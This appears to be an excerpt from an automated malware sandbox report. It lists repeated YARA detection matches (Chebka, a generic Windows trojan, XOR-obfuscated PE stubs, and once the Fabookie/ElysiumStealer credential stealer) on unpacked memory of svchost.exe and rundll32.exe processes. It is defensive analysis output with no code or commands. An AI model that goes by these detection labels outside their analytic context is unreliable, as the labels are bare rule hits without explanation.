        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
